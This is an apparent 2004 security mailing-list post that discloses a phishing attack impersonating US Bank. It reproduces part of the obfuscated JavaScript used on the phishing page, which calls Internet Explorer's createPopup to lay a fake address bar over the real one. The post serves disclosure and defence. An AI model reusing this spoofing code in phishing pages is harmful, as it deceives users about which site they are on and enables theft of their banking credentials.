IE URL Issue Being Used In Phishing In the Wild [USBank] May 13 2004 10:30PM
Drew Copley (dcopley eeye com) (2 replies)
One of our developers (Laurentiu Nicula) received an alarming type
of phishing attack today.

received: from UsBank.com ([])

[ = [ 82-33-97-75.cable.ubr10.azte.blueyonder.co.uk ]

The email looks legitimate enough, but links to:


The webpage attempts to throw up a little url bar of it's own
which covers IE's url bar. This allows a pretty convincing spoof
job to happen.

The pop up looks just like IE's url bar, and it is even selectable.

This does not work in Netscape.

It is very similiar to Malware's issues of late.

He protected the source pretty well, but it reveals some interesting
code which I googled to some Italian guy here (post made in December
of last year):


Here is the vulnerable code page:

HTTP/1.1 200 OK
Date: Thu, 13 May 2004 22:19:10 GMT
Server: Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2
mod_bwlimited/1.4 PHP/4.3.3 FrontPage/ mod_ssl/2.8.16
Last-Modified: Wed, 12 May 2004 03:47:59 GMT
ETag: "1da80c8-388-40a19e6f"
Accept-Ranges: bytes
Content-Length: 904
Keep-Alive: timeout=15, max=95
Connection: Keep-Alive
Content-Type: text/html

var vuln_x, vuln_y, vuln_w, vuln_h;
function vuln_calc() {
var root= document[
(document.compatMode=='CSS1Compat') ?
'documentElement' : 'body'
vuln_x= window.screenLeft+72;
vuln_y= window.screenTop-20;
vuln_w= root.offsetWidth-520;
vuln_h= 17;

var vuln_win;
function vuln_pop() {
vuln_win= window.createPopup();
vuln_win.document.body.innerHTML= vuln_html;
vuln_win.document.body.style.margin= 0;
vuln_win.document.body.onunload= vuln_pop;

function vuln_show() {
if (vuln_win)
vuln_win.show(vuln_x, vuln_y, vuln_w, vuln_h);

var vuln_html= '\x3Cdiv style="height: 100%; line-height: 17px;
font-family: \'Tahoma\', sans-serif; font-size:

[ reply ]
Re: IE URL Issue Being Used In Phishing In the Wild [USBank] May 15 2004 05:18AM
Nick FitzGerald (nick virus-l demon co uk)
Re: IE URL Issue Being Used In Phishing In the Wild [USBank] May 14 2004 05:44PM
Todd C. Campbell (todd campbell core com)


Privacy Statement
Copyright 2010, SecurityFocus